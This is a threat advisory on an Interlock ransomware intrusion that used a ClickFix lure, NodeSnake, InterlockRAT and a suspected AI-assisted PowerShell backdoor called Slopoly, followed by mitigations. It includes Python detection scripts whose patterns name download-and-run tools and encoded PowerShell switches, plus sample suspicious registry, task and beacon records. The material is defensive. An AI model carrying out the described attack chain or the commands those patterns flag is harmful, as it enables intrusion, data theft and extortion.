A recent Interlock ransomware intrusion has revealed the deployment of Slopoly, a suspected AI-assisted PowerShell backdoor that enabled the threat actor Hive0163 to maintain persistent access to a compromised server for over a week while conducting reconnaissance and data staging operations. This Interlock ransomware attack campaign targets corporate enterprises worldwide across Windows and Linux platforms, using sophisticated social engineering techniques and multi-stage malware deployment to achieve ransomware objectives. The attack began with a ClickFix social engineering tactic, where victims encountered a fake CAPTCHA-style verification page that secretly copied a malicious PowerShell script to the clipboard and instructed them to open the Windows Run dialog, paste the content, and execute it, thereby initiating the infection chain.
The Slopoly backdoor represents a significant evolution in ransomware attack methodologies, with researchers identifying multiple characteristics suggesting the malware code may have been generated or assisted by large language models, including extensive inline comments, structured logging capabilities, robust error handling mechanisms, and unused functions that are typical of AI-generated code. Following initial compromise through ClickFix social engineering, the threat actor Hive0163 deployed a multi-stage malware chain including NodeSnake, a Node.js-based first-stage malware that communicates through HTTP POST requests, and InterlockRAT, a JavaScript-based backdoor that communicates through WebSockets and provides expanded control capabilities including SOCKS5 tunnel creation and reverse shell spawning.
Using this established access, the Interlock ransomware attackers conducted extensive reconnaissance using tools like Advanced IP Scanner for internal network discovery, staged data for exfiltration using AzCopy cloud storage transfer utilities, and ultimately deployed Interlock ransomware delivered as a 64-bit Windows executable via the JunkFiction loader. The ransomware encrypts files using AES-GCM with RSA-protected keys through a statically linked OpenSSL library, appends extensions such as .!NT3RLOCK or .int3R1Ock to encrypted files, and drops ransom notes named FIRST_READ_ME.txt in affected directories demanding payment for decryption.
A recently uncovered intrusion involving the Interlock ransomware group revealed the deployment of a new backdoor called Slopoly, a malware strain that cybersecurity researchers believe may have been developed with the assistance of generative artificial intelligence technologies. During the security incident, the Interlock ransomware attackers managed to maintain persistent access to a compromised server for more than a week while quietly collecting sensitive data and preparing for ransomware deployment. The intrusion began with a ClickFix social engineering tactic, an increasingly popular attack technique where victims are tricked into executing malicious PowerShell commands disguised as legitimate system actions.
In this specific attack case, the victim encountered a fake CAPTCHA-style verification page that secretly copied a malicious script to the Windows clipboard and provided instructions directing them to open the Windows Run dialog using the Win+R keyboard shortcut, paste the clipboard content, and execute the command. This initial access technique is commonly associated with the threat actor Hive0163, which frequently combines ClickFix social engineering with malvertising campaigns and assistance from initial access brokers to compromise target organizations.
Once the victim executed the malicious command copied to their clipboard, the script automatically deployed NodeSnake, a Node.js-based malware that serves as the first stage of the attacker’s command-and-control framework. NodeSnake communicates with its remote operators through HTTP POST requests and supports multiple malicious capabilities, including downloading and executing additional payloads, running arbitrary shell commands on the compromised system, establishing persistence mechanisms to survive system reboots, and updating itself when required by the threat actors to add new functionality or evade detection.
Following the NodeSnake deployment, the attackers delivered a secondary payload known as InterlockRAT, a JavaScript-based backdoor that significantly expands the attacker’s control over the compromised system and network environment. InterlockRAT communicates with its operators through WebSocket connections and provides advanced capabilities including creating SOCKS5 proxy tunnels for network pivoting, spawning reverse shells for interactive command execution, and delivering additional malware payloads as needed throughout the attack progression. Both NodeSnake and InterlockRAT rely on hardcoded Cloudflare Tunnel infrastructure to conceal their command-and-control servers from network monitoring and security detection systems.
With initial access firmly established through NodeSnake and InterlockRAT, the attackers deployed Slopoly, a PowerShell-based backdoor placed in the C:\ProgramData\Microsoft\Windows\Runtime directory and configured to run persistently via a Windows scheduled task named “Runtime Broker” to masquerade as a legitimate Windows system process. Slopoly functions as a lightweight yet fully functional backdoor that collects system details such as the public IP address, username, privilege level, and hostname from the compromised machine.
This collected system information is transmitted as JSON-formatted heartbeat messages to the attacker’s command-and-control server every 30 seconds, while the malware simultaneously polls for new commands from the operators roughly every 50 seconds. Any received commands from the threat actors are executed through cmd.exe, and the command execution results are sent back to the server for operator review. The Slopoly script also maintains a rotating log file named persistence.log to track its operations.
Cybersecurity researchers noted several distinctive characteristics suggesting the Slopoly code may have been generated or assisted by a large language model such as ChatGPT or a similar AI system: extensive inline comments explaining code functionality, structured logging with detailed error messages, robust error handling throughout the codebase, and unused functions such as a “Jitter” routine that was generated but never invoked in the final malware. These characteristics are typical hallmarks of AI-generated code rather than traditionally hand-written malware.
Throughout the intrusion timeframe, the Hive0163 threat actor also deployed common ransomware operator tools to facilitate their objectives, including AzCopy for data staging and exfiltration to cloud storage platforms, and Advanced IP Scanner for internal network reconnaissance to identify additional targets and high-value systems within the compromised environment. These reconnaissance and data collection activities occurred over the course of more than a week, during which the attackers quietly gathered sensitive information while preparing for the final ransomware deployment phase.
The final stage of the attack involved deploying Interlock ransomware, delivered as a 64-bit Windows executable via the JunkFiction loader component. The Interlock ransomware encrypts victim files using AES-GCM encryption with RSA-protected encryption keys implemented through a statically linked OpenSSL library embedded in the malware executable. The ransomware appends distinctive file extensions such as .!NT3RLOCK or .int3R1Ock to encrypted files, and drops ransom notes named FIRST_READ_ME.txt in affected directories instructing victims on payment procedures.
Interlock ransomware also supports several command-line options that allow it to run with SYSTEM-level privileges for maximum file access, unlock files using the Windows Restart Manager API to encrypt files that are currently open by other processes, and remove itself after execution using a DLL component launched via rundll32.exe to eliminate forensic evidence of the attack.
Deploy security measures specifically targeting ClickFix social engineering attacks, such as disabling the Win+R keyboard shortcut via Group Policy on endpoints where it is not required for business operations, monitoring the RunMRU registry key for suspicious entries that indicate malicious command execution, and restricting PowerShell execution policies on endpoints to prevent unauthorized script execution by non-administrative users.
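As an added illustration of the RunMRU check (Python over a constructed registry export; not code from the advisory, HivePro or IBM X-Force): the parser below rebuilds the Run-dialog history in most-recent-first order and flags entries matching patterns a ClickFix lure typically relies on. The sample values, the pattern list and the placeholder command are assumptions made for the example. RunMRU only records what was launched through the Run dialog, so this catches the Win+R variant of the technique and nothing else; pair it with process-creation telemetry for the rest.

```python
import re

# Constructed sample of an exported RunMRU key (value name -> data), modelled on
# the real layout under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# each entry is a letter-named REG_SZ ending in "\1", and MRUList lists the
# letters most-recent-first. The entries are illustrative, not from a real host.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -NoP -c "<placeholder command>"\\1',
}

# Heuristics for Run-dialog commands a user is unlikely to type by hand.
# Each is (regex, reason); all are matched case-insensitively.
SUSPICIOUS_PATTERNS = [
    (r"\bpowershell(\.exe)?\b.*\s-(w|windowstyle)\s+hidden", "hidden PowerShell window"),
    (r"\s-(e|ec|enc|encodedcommand)\s", "encoded PowerShell command"),
    (r"\b(iex|invoke-expression)\b", "Invoke-Expression in command"),
    (r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b", "web download in command"),
    (r"\b(mshta|bitsadmin|certutil|curl|wget)\b", "download/execute utility"),
    (r"https?://", "URL passed to the Run dialog"),
]


def parse_runmru(values):
    """Return the Run-dialog history as a list of commands, most recent first."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        # Explorer appends a literal backslash-1 to every stored entry; drop it.
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def triage_runmru(values):
    """Return [(command, [reasons])] for entries matching ClickFix-style patterns."""
    findings = []
    for cmd in parse_runmru(values):
        reasons = [reason for pattern, reason in SUSPICIOUS_PATTERNS
                   if re.search(pattern, cmd, re.IGNORECASE)]
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {cmd!r} -> {', '.join(reasons)}")
```

The pattern list is deliberately short and reason-tagged so that an analyst sees why an entry fired; a single hit on a hidden-window or encoded-command switch in RunMRU is enough to warrant pulling the matching PowerShell process-creation and script-block logs from that host.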
Shift detection strategies to focus on behavioral analysis rather than relying solely on signature-based or malware-specific detection mechanisms, as AI-generated malware like Slopoly can be easily regenerated with different function names, variable names, and configuration values, effectively evading traditional signature-based detection systems while maintaining the same malicious functionality.
Implement comprehensive alerting on the creation of new Windows scheduled tasks, particularly those named “Runtime Broker” or similar names that mimic legitimate Windows system processes, and any scheduled task that executes PowerShell scripts or cmd.exe from ProgramData directories, which threat actors commonly abuse for malware persistence.
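The scheduled-task rule above, as an added example in Python over constructed records modelled on Security Event ID 4698 (scheduled task created); this is illustrative code, not the advisory's. The task XML, the script file name under the Runtime directory and the list of mimicked names are assumptions for the example; the Task Scheduler XML namespace is the real one, which is what lets the parser pull the Exec action out of a logged task definition.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Names of legitimate Windows components that attackers reuse as task names (assumed list).
MIMICKED_NAMES = {"runtime broker", "runtimebroker", "svchost", "dllhost", "wininit", "windows update"}
# Interpreters whose appearance in a task action warrants a closer look.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed events, modelled on the fields of Security Event ID 4698.
# The script file name "placeholder_script.ps1" is made up; only the directory is from the advisory.
SAMPLE_EVENTS = [
    {"TaskName": "\\Runtime Broker", "SubjectUserName": "jdoe",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-w hidden -NoP -ExecutionPolicy Bypass -File C:\\ProgramData\\Microsoft\\Windows\\Runtime\\placeholder_script.ps1</Arguments>
  </Exec></Actions>
</Task>"""},
    {"TaskName": "\\Microsoft\\Office\\OfficeTelemetryAgentLogOn", "SubjectUserName": "SYSTEM",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec>
    <Command>C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe</Command>
    <Arguments>scan upload</Arguments>
  </Exec></Actions>
</Task>"""},
]


def parse_task_actions(task_xml):
    """Return [(command, arguments)] for every Exec action in a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for exec_ in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (exec_.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (exec_.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        actions.append((cmd, args))
    return actions


def score_task(task_name, task_xml):
    """Return the list of reasons this task creation deserves an alert (empty if none)."""
    reasons = []
    normalized = re.sub(r"\s+", " ", task_name.strip().strip("\\").lower())
    if normalized in MIMICKED_NAMES:
        reasons.append(f"task name mimics a Windows component: {task_name!r}")
    for cmd, args in parse_task_actions(task_xml):
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        combined = f"{cmd} {args}".lower()
        if exe in INTERPRETERS:
            reasons.append(f"action runs a script interpreter: {exe}")
        if "\\programdata\\" in combined:
            reasons.append("action references ProgramData")
        if re.search(r"-(w|windowstyle)\s+hidden|-(e|enc|encodedcommand)\s|-nop\b", combined):
            reasons.append("action uses evasive PowerShell switches")
    return reasons


def alerts(events):
    """Return [(task_name, reasons)] for events that scored at least one reason."""
    out = []
    for e in events:
        reasons = score_task(e["TaskName"], e["TaskContent"])
        if reasons:
            out.append((e["TaskName"], reasons))
    return out


if __name__ == "__main__":
    for name, reasons in alerts(SAMPLE_EVENTS):
        print(f"ALERT {name}: " + "; ".join(reasons))
```

Because 4698 carries the full task XML, the rule can score the action rather than just the name, which matters here: "Runtime Broker" is a plausible name, but a task of that name whose action is powershell.exe with a hidden window pointing into ProgramData is not something Windows creates.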
Enforce PowerShell Constrained Language Mode across enterprise endpoints to limit script capabilities, and implement application whitelisting technologies to prevent unauthorized PowerShell scripts from executing on systems. Deploy monitoring for PowerShell processes making outbound HTTP POST requests at regular intervals, which may indicate command-and-control beaconing activity associated with backdoor malware.
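An added example of the beaconing check, which also covers the 30-second heartbeat and roughly 50-second command-polling cadence described earlier (Python over constructed egress records; not code from the advisory). Destination names, paths and timestamps are made up for the example, and the thresholds are assumptions to tune per environment. The detector groups POSTs by host, process, destination and path, then flags a series whose inter-request gaps have a low coefficient of variation, which is what a fixed-interval loop without jitter produces.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed proxy/EDR-style egress records (not real traffic). Fields:
# timestamp, host, process, HTTP method, destination, URL path, request bytes.
# The two c2-placeholder.example series mimic a 30 s heartbeat and a 50 s
# command poll; the intranet series is ordinary, irregular traffic.
SAMPLE_LOG = """\
2024-05-01T09:00:00Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 412
2024-05-01T09:00:00Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
2024-05-01T09:00:05Z WS01 powershell.exe POST intranet.corp.example /api/inventory 2048
2024-05-01T09:00:12Z WS01 powershell.exe POST intranet.corp.example /api/inventory 1910
2024-05-01T09:00:30Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 410
2024-05-01T09:00:47Z WS01 powershell.exe POST intranet.corp.example /api/inventory 2200
2024-05-01T09:00:50Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
2024-05-01T09:01:01Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 411
2024-05-01T09:01:30Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 412
2024-05-01T09:01:40Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
2024-05-01T09:02:00Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 410
2024-05-01T09:02:31Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 413
2024-05-01T09:02:31Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
2024-05-01T09:03:00Z WS01 powershell.exe POST c2-placeholder.example /api/heartbeat 412
2024-05-01T09:03:20Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
2024-05-01T09:03:20Z WS01 powershell.exe POST intranet.corp.example /api/inventory 1800
2024-05-01T09:04:02Z WS01 powershell.exe POST intranet.corp.example /api/inventory 2100
2024-05-01T09:04:10Z WS01 powershell.exe POST c2-placeholder.example /api/cmd 96
"""

MIN_REQUESTS = 5           # need enough samples to judge periodicity (assumed threshold)
MAX_CV = 0.15              # coefficient of variation of the gaps; lower = more regular
INTERVAL_RANGE = (5, 900)  # seconds; ignore bursts and very slow schedules


def parse_log(text):
    """Parse the whitespace-separated records into dicts with a datetime timestamp."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, proc, method, dst, path, size = line.split()
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "proc": proc, "method": method,
            "dst": dst, "path": path, "bytes": int(size),
        })
    return records


def detect_beacons(text, proc_filter=("powershell.exe", "pwsh.exe")):
    """Flag (host, process, destination, path) series whose POST timing is near-constant."""
    series = defaultdict(list)
    for r in parse_log(text):
        if r["method"] == "POST" and r["proc"].lower() in proc_filter:
            series[(r["host"], r["proc"], r["dst"], r["path"])].append(r["ts"])

    beacons = []
    for (host, proc, dst, path), stamps in series.items():
        if len(stamps) < MIN_REQUESTS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        med = float(median(gaps))
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if INTERVAL_RANGE[0] <= med <= INTERVAL_RANGE[1] and cv <= MAX_CV:
            beacons.append({"host": host, "proc": proc, "dst": dst, "path": path,
                            "requests": len(stamps), "median_interval": med, "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for b in detect_beacons(SAMPLE_LOG):
        print(f"{b['host']} {b['proc']} -> {b['dst']}{b['path']}: "
              f"{b['requests']} POSTs every ~{b['median_interval']:.0f}s (cv={b['cv']})")
```

Grouping by path is what separates the two loops in the sample: merged into one series, the 30 s heartbeat and 50 s poll would interleave into irregular gaps and the regularity test would miss both. Note that the Slopoly sample is described as having an unused jitter routine; a later build that actually calls it would raise the coefficient of variation, so this check should sit alongside volume and destination-reputation rules rather than replace them.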
Deploy detection rules for the unauthorized use of AzCopy and other cloud storage data transfer utilities within the enterprise environment, especially when executed outside of sanctioned IT operations workflows, as these legitimate tools are commonly abused by ransomware operators for large-scale data staging and exfiltration activities prior to encryption.
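An added example of such a rule, in Python over constructed process-creation records modelled on Sysmon Event ID 1 fields (not the advisory's code). The sanctioned accounts and hosts, the storage account placeholder and the event values are assumptions; the point is that an AzCopy execution is judged against who ran it, where from, and what it was asked to move, rather than on the binary alone, since the binary is legitimate.

```python
import re

# Assumptions (not from the advisory): identities and hosts allowed to run
# AzCopy as part of sanctioned backup or migration workflows.
SANCTIONED_ACCOUNTS = {"corp\\svc-backup"}
SANCTIONED_HOSTS = {"backup01"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\")
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}

# Constructed process-creation events, modelled on Sysmon Event ID 1 fields.
# Storage account and SAS token are placeholders, not real values.
SAMPLE_PROC_EVENTS = [
    {"host": "BACKUP01", "user": "CORP\\svc-backup",
     "image": "C:\\Tools\\AzCopy\\azcopy.exe",
     "parent": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": 'azcopy.exe copy "D:\\backups" "https://<storage-placeholder>.blob.core.windows.net/nightly?<sas-placeholder>" --recursive'},
    {"host": "FS02", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\azcopy.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'azcopy.exe copy "\\\\FS02\\finance" "https://<storage-placeholder>.blob.core.windows.net/x?<sas-placeholder>" --recursive'},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_azcopy(events):
    """Return findings for AzCopy executions that fall outside the sanctioned workflow."""
    findings = []
    for e in events:
        if _basename(e["image"]) != "azcopy.exe":
            continue
        user_ok = e["user"].lower() in SANCTIONED_ACCOUNTS
        host_ok = e["host"].lower() in SANCTIONED_HOSTS
        if user_ok and host_ok:
            continue  # sanctioned account on a sanctioned host: expected use
        reasons = []
        if not user_ok:
            reasons.append("unsanctioned account")
        if not host_ok:
            reasons.append("unsanctioned host")
        if any(seg in e["image"].lower() for seg in USER_WRITABLE):
            reasons.append("binary launched from a user-writable path")
        if _basename(e["parent"]) in INTERACTIVE_PARENTS:
            reasons.append("launched from an interactive shell")
        cmd = e["cmdline"].lower()
        if re.search(r"\bcopy\b.*\.blob\.core\.windows\.net", cmd) and "--recursive" in cmd:
            reasons.append("recursive upload to blob storage")
        if re.search(r'"\\\\[^"\\]+\\', cmd):
            reasons.append("source is a UNC share path")
        findings.append({"host": e["host"], "user": e["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_azcopy(SAMPLE_PROC_EVENTS):
        print(f"{f['host']} {f['user']}: " + "; ".join(f["reasons"]))
```

Whitelisting by account and host keeps the nightly backup job quiet while still surfacing the case the advisory describes: a user account on a file server recursively pushing a share to an external storage account from a copy of the tool dropped in a temp directory.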
Implement network segmentation to restrict lateral movement between critical systems and business units. Deploy micro-segmentation architectures for high-value servers to prevent ransomware propagation across network segments, limiting the potential blast radius of any successful compromise.
Maintain offline, immutable backups that are regularly tested for restoration capability to ensure business continuity in the event of ransomware encryption. Ensure backup systems are completely isolated from the production network to prevent ransomware from encrypting or destroying backup data during an attack, rendering recovery impossible.
The threat advisory includes comprehensive indicators of compromise associated with the Slopoly and Interlock ransomware campaign, including SHA256 file hashes, IPv4 addresses of command-and-control infrastructure, malicious domains including numerous Cloudflare Tunnel subdomains used to conceal attacker infrastructure, and the primary domain plurfestivalgalaxy.com. Organizations should integrate these indicators into their security monitoring systems, endpoint detection platforms, and network security devices to identify potential Hive0163 and Interlock ransomware activity within their environments.
The Slopoly and Interlock ransomware attack campaign employs multiple tactics and techniques mapped to the MITRE ATT&CK framework: Execution through malicious copy-and-paste user execution, malicious file execution, and command and scripting interpreters (PowerShell, Windows Command Shell, and JavaScript); Persistence via scheduled tasks and DLL hijacking; Discovery of system network configuration, system information, and network services; Command and Control using application layer protocols over web protocols, protocol tunneling, internal proxy capabilities, and web service abuse; Exfiltration over web services; and Impact through data encryption for ransom and service termination.
The threat advisory references authoritative security research from IBM X-Force on Slopoly and AI-enhanced ransomware attacks, and HivePro threat intelligence on Interlock ransomware deployment tactics. These references provide additional technical depth and analysis for security teams investigating Hive0163 activity or implementing defensive measures against Interlock ransomware and AI-assisted malware threats.